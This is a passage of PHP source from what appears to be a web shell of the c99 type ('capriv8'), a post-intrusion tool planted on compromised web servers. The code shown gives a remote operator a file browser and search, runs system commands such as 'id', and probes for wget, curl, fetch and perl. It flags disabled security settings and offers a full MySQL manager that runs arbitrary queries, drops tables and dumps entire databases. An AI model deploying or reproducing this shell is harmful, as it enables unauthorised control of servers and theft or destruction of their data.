function parse_perms($mode) { | |
if (($mode & 0xC000) === 0xC000) {$t = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$t = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$t = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$t = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$t = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$t = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$t = "p";} | |
else {$t = "?";} | |
$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; | |
$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; | |
$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; | |
return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); | |
} | |
} | |
if (!function_exists("parsesort")) { | |
function parsesort($sort) { | |
$one = intval($sort); | |
$second = substr($sort,-1); | |
if ($second != "d") {$second = "a";} | |
return array($one,$second); | |
} | |
} | |
if (!function_exists("view_perms_color")) { | |
function view_perms_color($o) { | |
if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} | |
elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} | |
else {return "<font color=green>".view_perms(fileperms($o))."</font>";} | |
} | |
} | |
if (!function_exists("mysql_dump")) { | |
function mysql_dump($set) { | |
global $sh_ver; | |
$sock = $set["sock"]; | |
$db = $set["db"]; | |
$print = $set["print"]; | |
$nl2br = $set["nl2br"]; | |
$file = $set["file"]; | |
$add_drop = $set["add_drop"]; | |
$tabs = $set["tabs"]; | |
$onlytabs = $set["onlytabs"]; | |
$ret = array(); | |
$ret["err"] = array(); | |
if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} | |
if (empty($db)) {$db = "db";} | |
if (empty($print)) {$print = 0;} | |
if (empty($nl2br)) {$nl2br = 0;} | |
if (empty($add_drop)) {$add_drop = TRUE;} | |
if (empty($file)) { | |
$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; | |
} | |
if (!is_array($tabs)) {$tabs = array();} | |
if (empty($add_drop)) {$add_drop = TRUE;} | |
if (sizeof($tabs) == 0) { | |
$res = mysql_query("SHOW TABLES FROM ".$db, $sock); | |
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} | |
} | |
$out = " | |
# Dumped by ".$sh_name." | |
# | |
# Host settings: | |
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." | |
# Date: ".date("d.m.Y H:i:s")." | |
# DB: \"".$db."\" | |
#---------------------------------------------------------"; | |
$c = count($onlytabs); | |
foreach($tabs as $tab) { | |
if ((in_array($tab,$onlytabs)) or (!$c)) { | |
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} | |
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); | |
if (!$res) {$ret["err"][] = mysql_smarterror();} | |
else { | |
$row = mysql_fetch_row($res); | |
$out .= $row["1"].";\n\n"; | |
$res = mysql_query("SELECT * FROM `$tab`", $sock); | |
if (mysql_num_rows($res) > 0) { | |
while ($row = mysql_fetch_assoc($res)) { | |
$keys = implode("`, `", array_keys($row)); | |
$values = array_values($row); | |
foreach($values as $k=>$v) {$values[$k] = addslashes($v);} | |
$values = implode("', '", $values); | |
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; | |
$out .= $sql; | |
} | |
} | |
} | |
} | |
} | |
$out .= "#---------------------------------------------------------------------------------\n\n"; | |
if ($file) { | |
$fp = fopen($file, "w"); | |
if (!$fp) {$ret["err"][] = 2;} | |
else { | |
fwrite ($fp, $out); | |
fclose ($fp); | |
} | |
} | |
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} | |
return $out; | |
} | |
} | |
if (!function_exists("mysql_buildwhere")) { | |
function mysql_buildwhere($array,$sep=" and",$functs=array()) { | |
if (!is_array($array)) {$array = array();} | |
$result = ""; | |
foreach($array as $k=>$v) { | |
$value = ""; | |
if (!empty($functs[$k])) {$value .= $functs[$k]."(";} | |
$value .= "'".addslashes($v)."'"; | |
if (!empty($functs[$k])) {$value .= ")";} | |
$result .= "`".$k."` = ".$value.$sep; | |
} | |
$result = substr($result,0,strlen($result)-strlen($sep)); | |
return $result; | |
} | |
} | |
if (!function_exists("mysql_fetch_all")) { | |
function mysql_fetch_all($query,$sock) { | |
if ($sock) {$result = mysql_query($query,$sock);} | |
else {$result = mysql_query($query);} | |
$array = array(); | |
while ($row = mysql_fetch_array($result)) {$array[] = $row;} | |
mysql_free_result($result); | |
return $array; | |
} | |
} | |
if (!function_exists("mysql_smarterror")) { | |
function mysql_smarterror($type,$sock) { | |
if ($sock) {$error = mysql_error($sock);} | |
else {$error = mysql_error();} | |
$error = htmlspecialchars($error); | |
return $error; | |
} | |
} | |
if (!function_exists("mysql_query_form")) { | |
function mysql_query_form() { | |
global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; | |
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} | |
if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;} | |
if ((!$submit) or ($sql_x)) { | |
echo "<table border=0><tr><td><form name=\"capriv8_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>"; | |
if ($tbl_struct) { | |
echo "<td valign=\"top\"><b>Fields:</b><br>"; | |
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.capriv8_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} | |
echo "</td></tr></table>"; | |
} | |
} | |
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} | |
} | |
} | |
if (!function_exists("mysql_create_db")) { | |
function mysql_create_db($db,$sock="") { | |
$sql = "CREATE DATABASE `".addslashes($db)."`;"; | |
if ($sock) {return mysql_query($sql,$sock);} | |
else {return mysql_query($sql);} | |
} | |
} | |
if (!function_exists("mysql_query_parse")) { | |
function mysql_query_parse($query) { | |
$query = trim($query); | |
$arr = explode (" ",$query); | |
$types = array( | |
"SELECT"=>array(3,1), | |
"SHOW"=>array(2,1), | |
"DELETE"=>array(1), | |
"DROP"=>array(1) | |
); | |
$result = array(); | |
$op = strtoupper($arr[0]); | |
if (is_array($types[$op])) { | |
$result["propertions"] = $types[$op]; | |
$result["query"] = $query; | |
if ($types[$op] == 2) { | |
foreach($arr as $k=>$v) { | |
if (strtoupper($v) == "LIMIT") { | |
$result["limit"] = $arr[$k+1]; | |
$result["limit"] = explode(",",$result["limit"]); | |
if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} | |
unset($arr[$k],$arr[$k+1]); | |
} | |
} | |
} | |
} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("cafsearch")) { | |
function cafsearch($d) { | |
global $found; | |
global $found_d; | |
global $found_f; | |
global $search_i_f; | |
global $search_i_d; | |
global $a; | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$h = opendir($d); | |
while (($f = readdir($h)) !== FALSE) { | |
if($f != "." && $f != "..") { | |
$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); | |
if (is_dir($d.$f)) { | |
$search_i_d++; | |
if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} | |
if (!is_link($d.$f)) {cafsearch($d.$f);} | |
} | |
else { | |
$search_i_f++; | |
if ($bool) { | |
if (!empty($a["text"])) { | |
$r = @file_get_contents($d.$f); | |
if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} | |
if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} | |
if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} | |
else {$bool = strpos(" ".$r,$a["text"],1);} | |
if ($a["text_not"]) {$bool = !$bool;} | |
if ($bool) {$found[] = $d.$f; $found_f++;} | |
} | |
else {$found[] = $d.$f; $found_f++;} | |
} | |
} | |
} | |
} | |
closedir($h); | |
} | |
} | |
if ($x == "gofile") { | |
if (is_dir($f)) { $x = "ls"; $d = $f; } | |
else { $x = "f"; $d = dirname($f); $f = basename($f); } | |
} | |
@ob_start(); | |
@ob_implicit_flush(0); | |
function onphpshutdown() { | |
global $gzipencode,$ft; | |
if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { | |
$v = @ob_get_contents(); | |
@ob_end_clean(); | |
@ob_start("ob_gzHandler"); | |
echo $v; | |
@ob_end_flush(); | |
} | |
} | |
function capriv8exit() { | |
onphpshutdown(); | |
exit; | |
} | |
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); | |
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); | |
header("Cache-Control: no-store, no-cache, must-revalidate"); | |
header("Cache-Control: post-check=0, pre-check=0", FALSE); | |
header("Pragma: no-cache"); | |
if (empty($tmpdir)) { | |
$tmpdir = ini_get("upload_tmp_dir"); | |
if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} | |
} | |
$tmpdir = realpath($tmpdir); | |
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); | |
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} | |
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} | |
else {$tmpdir_logs = realpath($tmpdir_logs);} | |
function showstat($stat) { | |
if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; } | |
else { return "<font color=red><b>OFF</b></font>"; } | |
} | |
function testperl() { | |
if (ex('perl -h')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function testfetch() { | |
if(ex('fetch --help')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function testwget() { | |
if (ex('wget --help')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function testoracle() { | |
if (function_exists('ocilogon')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function testpostgresql() { | |
if (function_exists('pg_connect')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function testmssql() { | |
if (function_exists('mssql_connect')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function testcurl() { | |
if (function_exists('curl_version')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function testmysql() { | |
if (function_exists('mysql_connect')) { return showstat("on"); } | |
else { return showstat("off"); } | |
} | |
function showdisablefunctions() { | |
if ($disablefunc=@ini_get("disable_functions")){ return "<font color=red><b>".$disablefunc."</b></font>"; } | |
else { return "<font color=#00FF00><b>NONE</b></b></font>"; } | |
} | |
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { | |
$safemode = TRUE; | |
$hsafemode = "<font color=#3366FF><b>SAFE MODE is ON (Secure)</b></font>"; | |
} | |
else { | |
$safemode = FALSE; | |
$hsafemode = "<font color=red><b>SAFE MODE is OFF (Not Secure)</b></font>"; | |
} | |
$v = @ini_get("open_basedir"); | |
if ($v or strtolower($v) == "on") { | |
$openbasedir = TRUE; | |
$hopenbasedir = "<font color=red>".$v."</font>"; | |
} | |
else { | |
$openbasedir = FALSE; | |
$hopenbasedir = "<font color=green>OFF (not secure)</font>"; | |
} | |
$sort = htmlspecialchars($sort); | |
if (empty($sort)) {$sort = $sort_default;} | |
$sort[1] = strtolower($sort[1]); | |
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); | |
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} | |
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."x=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); | |
@ini_set("highlight.bg",$highlight_bg); | |
@ini_set("highlight.comment",$highlight_comment); | |
@ini_set("highlight.default",$highlight_default); | |
@ini_set("highlight.html",$highlight_html); | |
@ini_set("highlight.keyword",$highlight_keyword); | |
@ini_set("highlight.string",$highlight_string); | |
if (!is_array($actbox)) { $actbox = array(); } | |
$dspact = $x = htmlspecialchars($x); | |
$disp_fullpath = $ls_arr = $notls = null; | |
$ud = urlencode($d); | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (empty($d)) {$d = realpath(".");} | |
elseif(realpath($d)) {$d = realpath($d);} | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$d = str_replace("\\\\","\\",$d); | |
$dispd = htmlspecialchars($d); | |
echo $html_start; | |
echo "<div class=barheader2><h3>$sh_name</h3><font color=lime>-.-\"</font></div><hr color=green>\n"; | |
echo "<table id=pagebar><tr><td width=50%><p>". | |
"Software : ".$DISP_SERVER_SOFTWARE ." - <a href=".$surl."x=phpini>php.ini</a><br>". | |
"$hsafemode<br>". | |
"OS : ".php_uname()."<br>"; | |
if (!$win) { echo "User ID : ".myshellexec("id"); } | |
else { echo "User : " . get_current_user(); } | |
echo "</p></td>". | |
"<td width=50%><p>Server IP : <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a> - ". | |
"Your IP : <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a><br>"; | |
if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";} | |
echo "Freespace : ".disp_freespace($d); | |
echo "</p></td></tr>"; | |
echo "<tr><td colspan=2><p>"; | |
echo "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql(). | |
" cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>"; | |
echo "Disabled Functions: ".showdisablefunctions(); | |
echo "</p></td></tr>"; | |
echo "<tr><td colspan=2 id=mainmenu>"; | |
if (count($quicklaunch2) > 0) { | |
foreach($quicklaunch2 as $item) { | |
$item[1] = str_replace("%d",urlencode($d),$item[1]); | |
$item[1] = str_replace("%sort",$sort,$item[1]); | |
$v = realpath($d.".."); | |
if (empty($v)) { | |
$a = explode(DIRECTORY_SEPARATOR,$d); | |
unset($a[count($a)-2]); | |
$v = join(DIRECTORY_SEPARATOR,$a); | |
} | |
$item[1] = str_replace("%upd",urlencode($v),$item[1]); | |
echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n"; | |
} | |
} | |
echo "</td><tr><td colspan=2 id=mainmenu>"; | |
if (count($quicklaunch1) > 0) { | |
foreach($quicklaunch1 as $item) { | |
$item[1] = str_replace("%d",urlencode($d),$item[1]); | |
$item[1] = str_replace("%sort",$sort,$item[1]); | |
$v = realpath($d.".."); | |
if (empty($v)) { | |
$a = explode(DIRECTORY_SEPARATOR,$d); | |
unset($a[count($a)-2]); | |
$v = join(DIRECTORY_SEPARATOR,$a); | |
} | |
$item[1] = str_replace("%upd",urlencode($v),$item[1]); | |
echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n"; | |
} | |
} | |
echo "</td><tr><td colspan=2 id=mainmenu>"; | |
if (count($quicklaunch3) > 0) { | |
foreach($quicklaunch3 as $item) { | |
$item[1] = str_replace("%d",urlencode($d),$item[1]); | |
$item[1] = str_replace("%sort",$sort,$item[1]); | |
$v = realpath($d.".."); | |
if (empty($v)) { | |
$a = explode(DIRECTORY_SEPARATOR,$d); | |
unset($a[count($a)-2]); | |
$v = join(DIRECTORY_SEPARATOR,$a); | |
} | |
$item[1] = str_replace("%upd",urlencode($v),$item[1]); | |
echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n"; | |
} | |
} | |
echo "</td></tr><tr><td colspan=2>"; | |
echo "<p class=fleft>"; | |
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); | |
$i = 0; | |
foreach($pd as $b) { | |
$t = ""; $j = 0; | |
foreach ($e as $r) { | |
$t.= $r.DIRECTORY_SEPARATOR; | |
if ($j == $i) { break; } | |
$j++; | |
} | |
echo "<a href=\"".$surl."x=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=#6666FF>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>"; | |
$i++; | |
} | |
echo " - "; | |
if (is_writable($d)) { | |
$wd = TRUE; | |
$wdt = "<font color=#00FF00>[OK]</font>"; | |
echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; | |
} | |
else { | |
$wd = FALSE; | |
$wdt = "<font color=red>[Read-Only]</font>"; | |
echo "<b>".view_perms_color($d)."</b>"; | |
} | |
?> | |
</p> | |
<div class=fright> | |
<form method="POST"><input type=hidden name=act value="ls"> | |
Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"> | |
</form> | |
</div> | |
</td></tr></table> | |
<?php | |
echo "<table id=maininfo><tr><td width=\"100%\">\n"; | |
if ($x == "") { $x = $dspact = "ls"; } | |
if ($x == "phpini" ) { get_phpini(); } | |
if ($x == "sql") { | |
$sql_surl = $surl."x=sql"; | |
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} | |
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} | |
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} | |
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} | |
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} | |
$sql_surl .= "&"; | |
echo "<table>". | |
"<tr><td width=\"100%\" colspan=2 class=barheader>"; | |
if ($sql_server) { | |
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); | |
$err = mysql_smarterror(); | |
@mysql_select_db($sql_db,$sql_sock); | |
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} | |
} | |
else {$sql_sock = FALSE;} | |
echo ".: SQL Manager :.<br>"; | |
if (!$sql_sock) { | |
if (!$sql_server) {echo "NO CONNECTION";} | |
else {echo "Can't connect! ".$err;} | |
} | |
else { | |
$sqlquicklaunch = array(); | |
$sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); | |
$sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)); | |
$sqlquicklaunch[] = array("Server-status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus"); | |
$sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars"); | |
$sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes"); | |
$sqlquicklaunch[] = array("Logout",$surl."x=sql"); | |
echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>"; | |
if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} | |
} | |
echo "</td></tr><tr>"; | |
if (!$sql_sock) { | |
echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">"; | |
echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"x\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>"; | |
} | |
else { | |
if (!empty($sql_db)) { | |
?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade> | |
<?php | |
$result = mysql_list_tables($sql_db); | |
if (!$result) {echo mysql_smarterror();} | |
else { | |
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; | |
$c = 0; | |
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} | |
if (!$c) {echo "No tables found in database.";} | |
} | |
} | |
else { | |
?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade> | |
<?php | |
$result = mysql_list_dbs($sql_sock); | |
if (!$result) {echo mysql_smarterror();} | |
else { | |
?><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"> | |
<?php | |
$c = 0; | |
$dbs = ""; | |
while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} | |
echo "<option value=\"\">Databases (".$c.")</option>"; | |
echo $dbs; | |
} | |
?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form> | |
<?php | |
} | |
echo "</td><td width=\"100%\">"; | |
$diplay = TRUE; | |
if ($sql_db) { | |
if (!is_numeric($c)) {$c = 0;} | |
if ($c == 0) {$c = "no";} | |
echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; | |
if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} | |
echo "</b></center>"; | |
$acts = array("","dump"); | |
if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";} | |
elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";} | |
elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";} | |
elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";} | |
elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";} | |
elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";} | |
elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";} | |
elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";} | |
elseif ($sql_tbl_x == "insert") { | |
if ($sql_tbl_insert_radio == 1) { | |
$keys = ""; | |
$akeys = array_keys($sql_tbl_insert); | |
foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} | |
if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} | |
$values = ""; | |
$i = 0; | |
foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} | |
if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} | |
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; | |
$sql_x = "query"; | |
$sql_tbl_x = "browse"; | |
} | |
elseif ($sql_tbl_insert_radio == 2) { | |
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); | |
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; | |
$result = mysql_query($sql_query) or print(mysql_smarterror()); | |
$result = mysql_fetch_array($result, MYSQL_ASSOC); | |
$sql_x = "query"; | |
$sql_tbl_x = "browse"; | |
} | |
} | |
if ($sql_x == "query") { | |
echo "<hr size=\"1\" noshade>"; | |
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} | |
if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;} | |
if ((!$submit) or ($sql_x)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";} | |
} | |
if (in_array($sql_x,$acts)) { | |
?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b> | |
<form action="<?php echo $surl; ?>"> | |
<input type="hidden" name="x" value="sql"> | |
<input type="hidden" name="sql_x" value="newtbl"> | |
<input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"> | |
<input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"> | |
<input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"> | |
<input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"> | |
<input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"> | |
<input type="text" name="sql_newtbl" size="20"> | |
<input type="submit" value="Create"> | |
</form></td> | |
<td width="30%" height="1"><b>Dump DB:</b> | |
<form action="<?php echo $surl; ?>"> | |
<input type="hidden" name="x" value="sql"> | |
